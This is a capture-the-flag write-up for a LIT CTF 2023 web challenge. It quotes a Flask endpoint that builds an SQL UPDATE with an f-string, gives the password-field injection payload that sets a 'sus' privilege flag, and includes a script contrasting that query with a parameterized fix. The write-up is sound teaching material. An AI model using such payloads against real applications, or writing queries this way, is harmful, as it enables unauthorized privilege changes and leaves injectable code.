
LIT CTF 2023 - amogsus-api

Description

Category: Web

I’m working on this new api for the awesome game amogsus. You can try it out here: http://litctf.org:31783/

amogsus-api.zip

Resolution

1. Overview

Here is the relevant information after reading the source code (main.py):

  • we can access the flag through the route /flag, but it checks that sus is true;
  • when we create an account, sus=False, so we can’t access the flag.

The goal is to change the value of sus to True.

There is a hint about the attack we should use: "Also, I think I might have forgotten to sanitize an input somewhere...."

Since the data is stored in a SQLite3 database, we know that we need a SQL injection.

After reading carefully the source code, we found the entrypoint for an injection:

@app.route('/account/update', methods=['POST'])
def update():
  with sqlite3.connect('database.db') as con:
    cursor = con.cursor()
    token = request.headers.get('Authorization', type=str)
    token = token.replace('Bearer ', '')
    if token:
      for session in sessions:
        if session['token'] == token:
          data = request.form
          username = data['username']
          password = data['password']
          if (username == '' or password == ''):
            return jsonify({'message': 'Please provide your new username and password as form-data or x-www-form-urlencoded!'})
          # INJECTION ENTRYPOINT
          cursor.execute(f'UPDATE users SET username="{username}", password="{password}" WHERE username="{session["username"]}"')
          con.commit()
          session['username'] = username
          return jsonify({'message': 'Account updated!'})
      return jsonify({'message': 'Invalid token!'})
    else:
      return jsonify({'message': 'Please provide your token!'})

The username and password are interpolated straight into the UPDATE statement with an f-string. We can set our password to the string password", sus=1, password="password so that the query becomes:

UPDATE users SET username="{username}", password="password", sus=1, password="password" WHERE username="{session["username"]}"

and sus is now set to 1 (true) for our user.
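To see the bug and its fix side by side, here is an added example (not the challenge's own code) that runs the same UPDATE shape against an in-memory SQLite table, once built with the f-string as in main.py and once with a parameterized query; the table layout and the user "alice" are assumed.

```python
import sqlite3

# The injection string from the writeup, sent as the new password.
PAYLOAD = 'password", sus=1, password="password'


def make_db():
    # Constructed sample table mirroring the fields main.py uses.
    con = sqlite3.connect(':memory:')
    con.execute('CREATE TABLE users (username TEXT, password TEXT, sus INTEGER)')
    con.execute('INSERT INTO users VALUES (?, ?, ?)', ('alice', 'old', 0))
    return con


def update_vulnerable(con, current, username, password):
    # Same construction as main.py: untrusted input spliced into the SQL text.
    con.execute(f'UPDATE users SET username="{username}", password="{password}" '
                f'WHERE username="{current}"')
    con.commit()


def update_safe(con, current, username, password):
    # Hardened form: placeholders keep the input as data, never as SQL.
    con.execute('UPDATE users SET username=?, password=? WHERE username=?',
                (username, password, current))
    con.commit()


def run_update(update_fn):
    # Applies the payload with the given update function and returns
    # (password, sus) for alice afterwards.
    con = make_db()
    update_fn(con, 'alice', 'alice', PAYLOAD)
    row = con.execute('SELECT password, sus FROM users WHERE username=?',
                      ('alice',)).fetchone()
    con.close()
    return row


if __name__ == '__main__':
    # Vulnerable: sus flips to 1. The password stays 'old' because SQLite
    # resolves the double-quoted "password" to the column of that name, and
    # the rightmost duplicate assignment wins.
    print(run_update(update_vulnerable))
    # Safe: the whole payload is stored as the password and sus stays 0.
    print(run_update(update_safe))
```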

2. Exploit

We use Insomnia to send requests to the server.

Sign in

Now we can log in:

Log in

And we need to add the token for authentication on the next requests:

Token

Now we can update our account and perform the SQL injection:

Update

And access the flag:

Flag

LITCTF{1njeC7_Th3_sUs_Am0ng_U5}.

This post is licensed under CC BY 4.0 by the author.